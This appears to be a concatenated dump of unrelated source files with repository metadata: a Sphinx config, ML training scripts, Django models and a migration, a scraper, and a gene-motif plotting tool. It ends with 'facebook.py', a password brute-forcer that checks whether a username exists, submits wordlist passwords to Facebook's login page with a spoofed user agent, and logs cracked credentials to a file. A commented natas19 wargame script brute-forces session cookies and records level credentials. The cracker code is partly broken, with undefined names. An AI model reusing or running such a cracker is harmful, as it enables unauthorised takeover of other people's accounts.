# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'django-telegrambotdoc'
# -- Options for LaTeX output --------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, documentclass [howto/manual]).
latex_documents = [
('index', 'django-telegrambot.tex', u'django-telegrambot Documentation',
u'django-telegrambot', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output --------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'django-telegrambot', u'django-telegrambot Documentation',
[u'django-telegrambot'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output ------------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'django-telegrambot', u'django-telegrambot Documentation',
u'django-telegrambot', 'django-telegrambot', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| [
"[email protected]"
] | |
c7885620d3be0baf6a989da71453344360e7faaa | 0e6d9b3a64bad502821e267465472dd156007e5f | /mnist.py | f0f0768ea0b63647b2dfc8d564a6cb6d508eb51b | [] | no_license | DuaneNielsen/efficientNet | 990894725fcbf80235574fbe87ca3d47a82cfcbc | 4b8b387890e470e07e66fb425b1450c011d506ef | refs/heads/master | 2023-04-15T02:28:03.716575 | 2021-05-07T22:43:00 | 2021-05-07T22:43:00 | 365,349,451 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,123 | py | import torch
import torch.nn as nn
from torch.utils.data import DataLoader, Subset
from torchvision.datasets import MNIST
from torch.optim import Adam
from torchvision import transforms
from torch.nn.functional import cross_entropy
from rich.progress import Progress
from collections import deque
from statistics import mean
from torchlars import LARS
from argparse import ArgumentParser
import wandb
import efficient_net
import os
if __name__ == '__main__':
args = ArgumentParser()
args.add_argument('--batch_size', type=int, default=8)
args.add_argument('--lars', action='store_true', default=False)
args.add_argument('--device', type=str)
args.add_argument('--seed', type=int)
args.add_argument('--lr', type=float, default=1e-4)
config = args.parse_args()
if 'DEVICE' in os.environ:
config.device = os.environ['DEVICE']
wandb.init(project='EfficientNet_MNIST', config=config)
if config.seed is not None:
torch.manual_seed(config.seed)
eff_net = efficient_net.EfficientNet(version="b0", num_classes=10).to(config.device)
if config.lars:
optim = LARS(Adam(eff_net.parameters(), lr=config.lr))
else:
optim = Adam(eff_net.parameters(), lr=config.lr)
ds = MNIST('~/.mnist', train=True, download=True, transform=transforms.ToTensor())
dl = DataLoader(ds, batch_size=config.batch_size)
test_s = MNIST('~/.mnist', train=False, download=True, transform=transforms.ToTensor())
test = DataLoader(test_s, batch_size=config.batch_size)
# reached 9762
with Progress() as progress:
t_epoch = progress.add_task('[red] epoch ...', total=100)
t_ds = progress.add_task('[magenta] dataset ...', total=len(ds) / config.batch_size)
t_test = progress.add_task('[blue] dataset ...', total=len(test_s) / config.batch_size)
losses = deque(maxlen=100)
for epoch in range(100):
progress.update(t_epoch, advance=1)
progress.reset(t_ds)
progress.reset(t_test)
for images, labels in dl:
images = images.to(config.device).expand(-1, 3, -1, -1)
labels = labels.to(config.device)
classes = eff_net(images)
loss = cross_entropy(classes, labels)
losses.append(loss.item())
progress.update(t_ds, advance=1, description=f'[magenta] {mean(losses):.5f}')
optim.zero_grad()
loss.backward()
optim.step()
correct = 0
total = 0
for images, labels in test:
images = images.to(config.device).expand(-1, 3, -1, -1)
labels = labels.to(config.device)
classes = eff_net(images)
classes = torch.argmax(classes, dim=1)
                for pred, truth in zip(classes, labels):
                    if pred == truth:
                        correct += 1
total += 1
progress.update(t_test, advance=1, description=f'[blue]{correct}/{total}')
wandb.log({'correct': correct})
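            # Note: the per-element zip loop above could be replaced by a
            # vectorized count, e.g. (a sketch):
            #     correct += (classes == labels).sum().item()
            #     total += labels.size(0)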
| [
"[email protected]"
] | |
0ebd026476efa34ac486487b217d08e9853ac2aa | df08b73174ff86bacf305a066eab3a33bf833df1 | /Python_1/HW4/Les_4_Task_5.py | d59c4873ed426a55040434a2dc757a82df902620 | [] | no_license | DanySat/Python | 2eb2aa900040fa0c7cd033d45842451061a38027 | 874e0126ba9eb7d69d906ab0a2895617a5c3477d | refs/heads/master | 2020-12-15T02:53:29.739692 | 2020-03-17T19:01:00 | 2020-03-17T19:01:00 | 234,971,390 | 0 | 0 | null | 2020-03-17T19:01:08 | 2020-01-19T21:33:55 | Python | UTF-8 | Python | false | false | 282 | py | while True:
number = int(input("Введи целое число от 3 до 20: "))
if 2 < number < 21:
print('Пятикратное число равно: ' + str(number * 5))
break
else:
print('Неверное число.')
continue
| [
"[email protected]"
] | |
a979d9410eea53ce04553cf6f644548604644c62 | c4ae5fb88fe588912a1e6cb78ce2744c5457b7e8 | /scrape.py | b0b5858470927615bd4c12143ed17ef3cb5737a7 | [] | no_license | ashingtondc/UrbanDictionaryScraper | bec9ab44d693b6f9c23623ec4f42de7be8d51354 | 0de4b2e1dd4fa88c4806642533e9d3be7e7ed733 | refs/heads/main | 2023-02-25T17:22:15.055818 | 2021-01-29T06:13:22 | 2021-01-29T06:13:22 | 334,049,514 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 470 | py | from scrape_utils import scrape_letter
import logging
import multiprocessing as mp
logging.basicConfig(
filename='scrape.log',
filemode='a',
level=logging.INFO,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%m/%d/%Y %I:%M:%S %p')
pool = mp.Pool(processes=4)
results = [pool.apply_async(scrape_letter, args=[i]) for i in range(65, 91)]
output = [p.get() for p in results]
pool.close()
pool.join()
# for i in range(65, 91):
# scrape_letter(i)
| [
"[email protected]"
] | |
f10f370d928a81de9544c76c61015dd5327ca8f7 | 4eddf6a34715752dc652571b1ab274f51ceb5da0 | /.history/yjs/test_20210606185816.py | 1f68cb0473491ea4a626df30ac2c94945d345bd0 | [] | no_license | Suelt/Hust-SE-introduction-to-ML | 649aba0e5b41363ceac03330ef02982982a0615d | a66785c3085da573f5748d13608eabf02e616321 | refs/heads/master | 2023-05-27T13:13:41.058545 | 2021-06-10T05:44:02 | 2021-06-10T05:44:02 | 375,582,438 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 991 | py | import numpy as np
from tensorflow.keras.datasets import mnist
def convert_to_one_hot(y, C):
return np.eye(C)[y.reshape(-1)].T
def sigmoid(inX):
    return 1.0 / (1 + np.exp(-inX))
size = [784, 30, 10]  # input, hidden and output layer widths
weight = [np.random.randn(ch2,ch1)
for ch1,ch2 in zip(size[:-1], size[1:])]
# weight shapes: (30, 784) and (10, 30); z = np.dot(w, x) + b
bias = [np.random.rand(s, 1) for s in size[1:]]
(train_x, train_y), (test_x, test_y) = mnist.load_data()
train_data = []
train_x = train_x.reshape([60000, 784])
for i in range(train_x.shape[0]):
# print(convert_to_one_hot(train_y[i],10).shape)
train_data.append([train_x[i]/255, convert_to_one_hot(train_y[i], 10)])
test_data = []
test_x = test_x.reshape([10000, 784])
for i in range(10000):
test_data.append([test_x[i]/255, test_y[i]])
x, y = train_data[0]
print(y.size)
print(x.size)
#print(x)
for b, w in zip(bias, weight):
z = np.dot(w, x) + b
x = sigmoid(z)
print(x.size) | [
"[email protected]"
] | |
c4edc1b7dc0d2e222f4048ccba62a3aa1040b6a0 | 0306e5ea656a976ed3e23f2eb207a2565efa77c5 | /src/moderations/models.py | 7f68208f4f3d40e4829db8759dd412963049413c | [
"MIT"
] | permissive | definitelysecure/shipwrecked | 7cf28e3dfcd66082746638e7830eeb128fbdc403 | 3b79c6df63ed3c271ccb1b8a21081c76bcd9f08a | refs/heads/master | 2020-03-29T05:14:09.856261 | 2018-09-20T08:07:52 | 2018-09-20T08:07:52 | 149,574,034 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,100 | py | from __future__ import unicode_literals
from django.db import models
class ModerationManager(models.Manager):
"""
Provide methods to reduce code in views.
"""
def get_by_message_id(self, message_id):
return self.filter(message_id=message_id).first()
class Moderation(models.Model):
"""
Record Moderation request from client service
"""
content_key = models.TextField()
content = models.TextField()
content_author_id = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
status = models.CharField(max_length=50)
status_reason = models.CharField(max_length=50)
status_date = models.DateTimeField(auto_now=True)
message_id = models.TextField(blank=True, null=True)
objects = ModerationManager()
class ModerationAction(models.Model):
"""
Keep history of back and forth between service and Slack.
"""
    # on_delete is required from Django 2.0 onward; CASCADE matches the old default
    moderation = models.ForeignKey(Moderation, on_delete=models.CASCADE)
action = models.CharField(max_length=50)
action_author_id = models.TextField()
created_at = models.DateTimeField(auto_now_add=True)
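# Hypothetical usage of the custom manager (the message id is a placeholder):
#
#     moderation = Moderation.objects.get_by_message_id('1530000000.000123')
#     if moderation:
#         ModerationAction.objects.create(moderation=moderation,
#                                         action='approve',
#                                         action_author_id='U123ABC')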
| [
"[email protected]"
] | |
d1d54b1b8df0b844653460855a20130d05b2162a | 4af115348bf6d3fa5bb4eaefa77cf1cb214085cf | /account/migrations/0007_auto_20211029_1229.py | 1941dd729154bc0eb09c633c2f5e01871fc8341e | [] | no_license | Leonlee999/webscraping | e00ceaac3bd4d87c60e011e998dddcf539705caa | 6406737f19afdb647d2da13065f49b4e15a8ed94 | refs/heads/master | 2023-08-28T21:47:31.275403 | 2021-11-11T03:27:54 | 2021-11-11T03:27:54 | 424,569,050 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | # Generated by Django 3.0 on 2021-10-29 06:59
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('account', '0006_auto_20211028_1541'),
]
operations = [
migrations.AddField(
model_name='user',
name='c_company',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='c_ctc',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='college',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='user',
name='degree',
field=models.CharField(blank=True, max_length=200, null=True),
),
migrations.AddField(
model_name='user',
name='experience',
field=models.CharField(blank=True, max_length=100, null=True),
),
migrations.AddField(
model_name='user',
name='grade',
field=models.CharField(blank=True, max_length=10, null=True),
),
migrations.AddField(
model_name='user',
name='skills',
field=models.CharField(blank=True, max_length=200, null=True),
),
]
| [
"[email protected]"
] | |
9b157c9f8b7dee6f286c8027208406a14e2a6b4f | 29e6bb047c5723c6e90a0209305f2167f3cae8be | /Algorithm/stone_division.py | e007c89bf49bffdcd585c4a1cb634c79e5b0cd7b | [] | no_license | basant-kumar/Hackerrank | a42c93e1efc95dd19e0704bf45db4e6492b0b7f2 | 4b35c62e8942d8887257da5a48f827f337bf08a8 | refs/heads/master | 2021-01-11T00:12:10.737874 | 2017-01-06T15:46:45 | 2017-01-06T15:46:45 | 70,580,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,041 | py | dp = {}
s=[]
def recs(n, c, p):
l = len(s)
pw = False
if p==1:
q=2
else:
q=1
div = False
for i in range(0,l):
if n%s[i]==0:
div = True
#print ' n = '+`n`+' n/si = '+`n/s[i]`+' p = '+`p`+' c = '+`c`
if not n/s[i] in dp:
dp[n/s[i]] = recs(n/s[i],s[i],q)
if dp[n/s[i]]==p:
pw=True
break
elif dp[n/s[i]]==p:
pw = True
break
else:
pass
    if div:
        if pw and c % 2 == 1:
            # print ' winner : '+`p`
            return p
        elif not pw and c % 2 == 0:
            # print ' winner : '+`q`
            return p
        else:
            return q
    else:
        return q
t = raw_input()
t = t.split(' ')
n = int(t[0])
m = int(t[1])
x = raw_input()
x = x.split(' ')
for i in range(0,m):
s.append(int(x[i]))
if recs(n, 1, 1) == 1:
print 'First'
else:
print 'Second' | [
"[email protected]"
] | |
61394911ab48fc156a2ff9b7fdba2e12ffd3cbe1 | 84d3cc3d2e577d19b471b96f1ea994c069665614 | /bin/demo_get_related_pmids.py | 1fd5db2aa76a413e36c06053057766cc338383e2 | [
"Apache-2.0"
] | permissive | jvansan/metapub | 8a5157ff9d95151690c551fbddcebfec3f5cd93e | d5e7a2401c1598b1e2662d2f91491296e605281d | refs/heads/master | 2020-11-25T02:51:57.537383 | 2020-01-09T22:24:39 | 2020-01-09T22:24:39 | 228,463,348 | 0 | 0 | Apache-2.0 | 2019-12-16T19:48:54 | 2019-12-16T19:48:54 | null | UTF-8 | Python | false | false | 646 | py | from __future__ import absolute_import, print_function, unicode_literals
import sys
from metapub import PubMedFetcher
fetch = PubMedFetcher()
try:
pmid = sys.argv[1]
except IndexError:
print("Supply a pubmed ID as the argument to this script.")
sys.exit()
result = fetch.related_pmids(pmid)
for key in list(result.keys()):
print(key)
for pmid in result[key]:
outp = pmid
article = fetch.article_by_pmid(pmid)
#outp += ' %s' % article.title
outp += ' %s' % article.citation
if article.pmc:
outp += ' (PMC)'
outp += '\n'
print(outp)
print("")
| [
"[email protected]"
] | |
d244482137c56cba1378c26bdda524155e967880 | 076ba705851d8436151768c793b87156bd8dac64 | /motifmark_oop.py | 38161f0f408f9adee5bc527b9d906377efb49791 | [] | no_license | demiglidden/motif-mark-oop | d94315a69bf25dc203be4c698009aa730305ecbf | 93ecd3c575cd40e556622e25ea9394026c560fe3 | refs/heads/main | 2023-03-15T07:19:20.329551 | 2021-03-07T02:52:34 | 2021-03-07T02:52:34 | 343,573,847 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,894 | py | #!/usr/bin/env python
#########################################################################################################
## This program will take fasta file of genes (where exons are capitalized and introns are lower case) ##
## and a file of motifs (each motif on it's own line) and will produce a visualiztion of all ##
## motif locations on each gene using object oriented programming. ##
##########################################################################################################
import cairo
import argparse
import re
def get_args():
parser = argparse.ArgumentParser("a program to produce two-line fastas")
parser.add_argument("-f", "--fasta", type=str, help="fasta file of genes to pass through program", required=True)
parser.add_argument("-m", "--motifs", type=str, help="motif file", required=True)
parser.add_argument("-o", "--output", type=str, help="name of output (optional), default output uses name of fasta file", required=False)
return parser.parse_args()
args = get_args()
###assign arguments to variables inside of program
fasta = args.fasta
motifs = args.motifs
out = args.output
# use the -o name if given, otherwise the fasta file's prefix, for the svg output
outputname = out if out else re.split(r'\.', fasta)[0]
#motif disambiguation dictionary
regex_dict = {
"A":"[Aa]",
"C":"[Cc]",
"G":"[Gg]",
"T":"[TtUu]",
"U":"[UuTt]",
"W":"[AaTtUu]",
"S":"[CcGg]",
"M":"[AaCc]",
"K":"[GgTtUu]",
"R":"[AaGg]",
"Y":"[CcTtUu]",
"B":"[CcGgTtUu]",
"D":"[AaGgTtUu]",
"H":"[AaCcTtUu]",
"V":"[AaCcGg]",
"N":"[AaCcGgTtUu]",
"Z":"[-]",
}
#############
# Functions #
#############
def find_exon(seq):
'''this function will return the start and end positions of the exon'''
exon_tuple = re.search('([A-Z]+)', seq)
exon = exon_tuple.span()
return exon
def get_regex(motif):
'''this function will take a motif and return a regex to find that motif'''
motif_regex = ""
for char in motif:
motif_regex += regex_dict[char]
return(motif_regex)
def find_positions(seq, reggie):
    '''return a list of (start, end) spans for every match of regex reggie in seq'''
    pos_list = []
    for match in re.finditer(reggie, seq):
        pos_list.append(match.span())
    return pos_list
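# Example (not executed; values follow regex_dict above):
#     get_regex("YGCY")                               -> '[CcTtUu][Gg][Cc][CcTtUu]'
#     find_positions("aatgcctGCt", get_regex("YGCY")) -> [(2, 6), (6, 10)]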
###########
# Classes #
###########
class FastaHeader:
'''A FastaHeader object stores its start, text, and maybe font.'''
def __init__(self, context, header, gene_count):
#data
self.context = context
self.header = header
self.gene_count = gene_count
#methods
def draw(self, context):
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15, int(self.gene_count)*VERT_PAD + 10)
context.show_text(self.header)
class Gene:
'''Gene class – A Gene object should be given enough information that it can figure out how to draw itself.'''
def __init__(self, context, gene, gene_count):
#data
self.context = context
self.gene = gene
self.gene_count = gene_count
#methods
def draw(self, context):
'''this method will draw the gene as a horizontal black line, proportional to it's length in nucleotides'''
context.set_line_width(3)
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15, int(self.gene_count)*VERT_PAD + 30)
context.line_to(15+len(self.gene), int(self.gene_count)*VERT_PAD + 30)
context.stroke()
class Exon:
'''An Exon object stores its start, length, and maybe width, similar to Gene.'''
def __init__(self, context, coords, gene_count):
#data
self.coords = coords
self.gene_count = gene_count
#methods
def draw(self, context):
'''this method will draw the exon on the gene'''
context.set_source_rgba(0.23,0.25,0.25, 1)
context.rectangle(15+int(self.coords[0]),int(self.gene_count)*VERT_PAD+20,int(self.coords[1])-int(self.coords[0]),15) #(x0,y0,x1,y1)
context.fill()
class Motifs:
'''A Motifs object stores a list of motif positions along a given gene and can draw them.'''
def __init__(self, context, coords_list, R, G, B, gene_count):
#data
self.context = context
self.coords_list = coords_list
self.gene_count = gene_count
self.R = R
self.G = G
self.B = B
#methods
def draw(self, context):
'''this methods will draw rectangles for the motif positions on the gene-line for the coordinates produced by find_positions()'''
for i in self.coords_list:
coords = list(i)
context.set_source_rgba(float(self.R),float(self.G),float(self.B),.7)
context.rectangle(15+int(coords[0]),int(self.gene_count)*VERT_PAD+20,int(coords[1])-int(coords[0]),15) #(x0,y0,x1,y1)
context.fill()
class GeneGroup:
'''A gene group object manages and organizes the information (gene, exon, and motifs) for each fasta record'''
def __init__(self):
#data
self.gene_count = None
self.header = None
self.gene = None
self.exon = None
self.motifs = []
self.context = None
#methods
def draw(self, context):
self.header.draw(context)
self.gene.draw(context)
self.exon.draw(context)
for i in self.motifs:
i.draw(context)
#############
# Algorithm #
#############
## parse file to get number of genes and length of longest gene to format context ##
gene_count = 0
gene = ''
seqs = []
#iterate through the file to get the gene count and longest gene for svg dimensions
with open (fasta, "r") as fh:
for line in fh:
if line[0] != '>':
seq = line.strip()
gene += seq
else:
gene_count += 1
seqs.append(gene)
gene = ''
seqs.append(gene)
longest_gene = (len(max(seqs, key=len)))
## figure set up using gene count ##
VERT_PAD = 50 #this number dictates the space between genes, or the 'vertical padding'
WIDTH = int(longest_gene) + 30 #width of figure
HEIGHT = int(gene_count+10) * VERT_PAD #height of figure
surface = cairo.SVGSurface(outputname + '.svg', WIDTH, HEIGHT) # drawing surface and output name
context = cairo.Context(surface) #create the coordinates you will be drawing on
#establish motif colors
Rs = ("0.27","1","0.20","0.75","1")
Gs = ("0.5",".63","0.11","0.13",".72")
Bs = ("0.08",".15","1.00","0.06",".83")
## parse through file again to store data as objects and draw the figure ##
motifs_list = []
GENE_COUNT = 0
gene = ''
GENE_GROUPS = []
with open (fasta, "r") as fh, open (motifs, "r") as mt:
#extract motifs from file into list
for line in mt:
motif = line.strip()
motif = motif.upper()
if motif not in motifs_list:
motifs_list.append(motif)
#start parsing the fasta
for line in fh:
if line[0] == '>':
if gene != '':
# gene #
group_obj.gene = Gene(context, gene, GENE_COUNT)
# exon #
coords = find_exon(gene)
group_obj.exon = Exon(context, coords, GENE_COUNT)
# motifs #
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
for motif in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
reggie = get_regex(motif)
coords_list = find_positions(gene, reggie)
group_obj.motifs.append(Motifs(context, coords_list, R, G, B, GENE_COUNT))
group_obj.gene_count = GENE_COUNT
# add gene group to list
GENE_GROUPS.append(group_obj)
                # reset the gene sequence and advance the row counter
                GENE_COUNT += 1
                gene = ''
            # start a fresh group for the record this header opens
            group_obj = GeneGroup()
            header = line.strip()
            group_obj.header = FastaHeader(context, header, GENE_COUNT)
else:
seq = line.strip()
gene += seq
#repeat for last sequence
# gene #
group_obj.gene = Gene(context, gene, GENE_COUNT)
coords = find_exon(gene)
group_obj.exon = Exon(context, coords, GENE_COUNT)
# motifs #
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
for motif in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
reggie = get_regex(motif)
coords_list = find_positions(gene, reggie)
group_obj.motifs.append(Motifs(context, coords_list, R, G, B, GENE_COUNT))
GENE_GROUPS.append(group_obj)
for gene_group in GENE_GROUPS:
    gene_group.draw(context)
#draw legend
#make motif colors iterable one last time
itR = iter(Rs)
itG = iter(Gs)
itB = iter(Bs)
motif_counter = 0
#write "legend"
context.set_source_rgba(0, 0, 0, 1)
context.move_to(15,(int(GENE_COUNT)+1)*VERT_PAD+15)
context.show_text("Legend")
for i in motifs_list:
#call motif color
R = next(itR)
G = next(itG)
B = next(itB)
#draw legend
context.set_source_rgba(float(R), float(G), float(B), .9)
context.rectangle(15,((GENE_COUNT+1)*VERT_PAD)+int(motif_counter+1)*20,40,10)
context.fill()
#write motif
context.move_to(60,((GENE_COUNT+1)*VERT_PAD)+int((motif_counter+1)*20)+10)
context.show_text(i)
motif_counter += 1
surface.finish() #close svg file | [
"[email protected]"
] | |
31b149a4ed5f3f4b04509a67768e7fbec1f1c3ab | 651bf57e96ce5471919b2d13a450d2692dae2f07 | /vacancy/apps.py | c3507b2355507b514f7a2d9a60c837e444320365 | [] | no_license | vacuumfull/hh-parser | 3cb45cd5a4191cafd38a71489456c9fa69ff641f | 4b50be35d4a58d570865fe439af85720ae5410f8 | refs/heads/master | 2020-03-08T20:11:31.964286 | 2018-02-28T10:59:09 | 2018-02-28T10:59:09 | 128,375,655 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 87 | py | from django.apps import AppConfig
class VacancyConfig(AppConfig):
name = 'vacancy' | [
"[email protected]"
] | |
1a81bf4235d3360478e2013bec61e305dbcb00b8 | f3acce90044b2745a6f8da0750d0e6dc1e79c225 | /natas19.py | 02f2a56b84dfef31e3c5df9169cd4aa634855bcf | [] | no_license | aprilian404/Natas | 446a18bfdcc44ed24a7acbffc32e51aa5af4b248 | 43a74293f0eeeb6582e404d048dbfc811d73b094 | refs/heads/master | 2021-03-06T07:40:54.892754 | 2020-03-12T14:18:57 | 2020-03-12T14:18:57 | 246,189,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 701 | py | # import requests
# URL = "http://natas19.natas.labs.overthewire.org/"
# Username='natas19'
# Password='4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs'
# i = 0
# while i < 641:
# session = 'PHPSESSID='+''.join([str(30+int(c)) for c in str(i)])+'2d61646d696e'
# query = {'username':'admin','password':'a'}
# res = requests.post(URL, data=query, headers = {'Content-Type': 'application/x-www-form-urlencoded','Cookie': session} , auth=(Username, Password) )
# if not 'regular' in (str(res.content, 'utf-8')):
# print('Result', session)
# print('\n\n', res.content)
# break
# print(i)
# i = i+1
# # Username: natas20
# # Password: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF
| [
"[email protected]"
] | |
dfcdf54d7cdde78843d63e2e36fc58360aefdfa1 | 29452669ce7c2ed267e14a9f83bfae999da2c5d8 | /Social-Cracker(main code 2018))/Individual Modules/facebook.py | 9aaa6e65550cab7f19dcc6b0120a1f65c6f9e717 | [] | no_license | Firestormhacker/Large-Social-Cracker | 64c5ee0ac7ce17ffca19ec1baf385f0ae0fd68cb | 7359885b56092e8a9ec1d31c95487d19fe6ae0e1 | refs/heads/master | 2020-03-24T22:25:58.625959 | 2018-08-01T00:57:48 | 2018-08-01T00:57:48 | 143,085,291 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,938 | py | #!/usr/bin/env python
def facebook():
site = 'Facebook'
attempt=0
e = os.system(d)
print ""+G+" "
d = '''
{}<><><><><><><><><><><><><><><><><><><><><>{}
{ Facebook-Cracker 3.0| Created by Andrew-El }
{}<><><><><><><><><><><><><><><><><><><><><>{}
'''
url = 'https://www.facebook.com/login.php'
d
print '''
Username or Phone number/email?
p = phone, u = username
'''
pu = raw_input("option:").lower()
if pu == 'u':
username = raw_input('Username:')
ulio = requests.get('https://www.facebook.com/' + username)
if ulio.status_code == 200:
e
print "Username Exists!"
else:
print("That doesn't Exist!")
sleep(3)
e
facebook()
elif pu == 'p':
username = raw_input(color.BLUE + 'Phone_Number/Email:')
else:
print 'not an option'
sleep(3)
os.system(d)
facebook()
wordliste = raw_input(color.YELLOW + 'PATH to wordlist:' + color.GREEN)
try:
wordlister = open(wordliste, 'r')
except:
print "list isn't found"
sleep(3)
os.system(d)
facebook()
print("Default is 4")
timmir = int(raw_input(color.YELLOW + "delay time between guesses:" + color.GREEN) or 4)
os.system(d)
print 'Do you want to save the output to a file?'
deltaco = raw_input(':')
os.system(d)
fil = raw_input(color.YELLOW + 'PATH to output file:' + color.GREEN)
try:
fil = open(fil, 'a')
except:
os.system(d)
print "That doesn't exist"
deltaco = deltaco.lower()
wordlist = list(wordlister)
for password in wordlist:
try:
attempt=attempt+1
password = password.strip()
f = mechanize.Browser()
f.set_handle_equiv(True)
f.set_handle_referer(True)
f.set_handle_robots(False)
f.addheaders = [('User-Agent', useragent)]
response = f.open(url)
f.form = list(f.forms())[0]
f.form['email'] = username
f.form['pass'] = password
f.method = 'POST'
response = f.submit()
if response.geturl() == 'https://www.facebook.com/':
print ""+B+" "
print
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordlist)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + 'Username:' + username + 'Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|'+ 'Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File saved!"
menuit()
if deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
elif response.geturl() == 'https://www.facebook.com/checkpoint/?next':
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + '|' + 'Username:' + username + ' Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|' + ' Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File Saved!"
menuit()
elif deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
elif response.geturl() == 'https://www.facebook.com/?sk=welcome':
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password Found!')
print(color.GREEN + site + '|' + 'Username:' + username + ' Password' + password + color.BLUE)
if deltaco == 'yes':
attempt = str(attempt)
fil.write('\n' + site + '|' + ' Username/Phone:' + username + ' Password:' + password + ' Attempt:' + attempt)
print "File Saved!"
menuit()
elif deltaco == 'no':
pass
else:
print "nope, that doesn't work"
quit()
else:
print ""+B+" "
print'[-]=============================[-]'
print'[-]Facebook-Cracker|V3.0|Andrew [-]'
print'[-]=============================[-]'
print response.geturl()
print'[-]+++++++++++++++++++++++++++++[-]'
print('{Username:%s' % username)
print('{Wordlist:%s' % wordliste)
print('{password:%s' % password)
print('{Attempt:%s' % attempt)
print('------------------------------')
print('Password:%s Does not work!' % password)
sleep(timmir)
os.system(d)
except KeyboardInterrupt:kill()
| [
"[email protected]"
] | |
